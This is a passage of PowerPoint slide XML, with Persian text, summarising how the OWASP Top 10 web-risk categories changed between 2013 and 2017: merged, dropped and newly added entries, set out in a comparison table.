                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>که فقدان آن باعث ممانعت یا تاخیر قابل توجه کشف فعالیت های مشکوک و رخنه ها ، واکنش به حوادث ، و فارنزیک دیجیتال میشود.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مرج شده یا بازنشسته شده، اما فراموش نشده : </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4-Insecure Direct Object References</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>و</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> A7-Missing Function Level Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ادغام شده به </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0"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smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8-Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>از آنجایی که فریمورگ های بسیاری دارای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>محافظ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>هستند ، این مورد تنها در ۵ درصد از برنامه های کاربردی یافت شده.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10-Unvalidated Redirects and Forwards </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>از انجایی که در تقریبا ۸ درصد از برنامه های کاربردی یافت شد،‌به طور کلی به صور </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ارائه شد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950"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2199078408"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6218110"/>
          <a:ext cx="6858000" cy="3733800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3247102">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="334298">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3276600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تزریق</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تزریق</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>احراز هویت ناقص و مدیریت نشست</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>احراز هویت ناقص </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>افشای اطلاعات حساس</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ارجاع مستقیم نا امن به شی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ادغام</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>+A7]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00" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>جدید</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تنظیمات اشتباه امنیتی</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> مدیریت کنترل شکسته</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ادغام شده</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>افشای اطلاعات حساس</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تنظیمات اشتباه امنیتی </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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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fa-IR" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تابع جا افتاده ی مرحله ی کنترل دسترسی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ادغام</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>+A4]</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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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7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  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> نا امن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="90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fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>جدید</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>جامعه</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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>استفاده از کامپوننت هایی با آسیب پذیری های شناخته شده</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fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>استفاده از کامپوننت هایی با آسیب پذیری های شناخته شده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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ارجاع ها و ریدایرکت های معتبرسازی نشده</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> مانیتورینگ و لاگینگ نا کارآمد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fa-IR" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
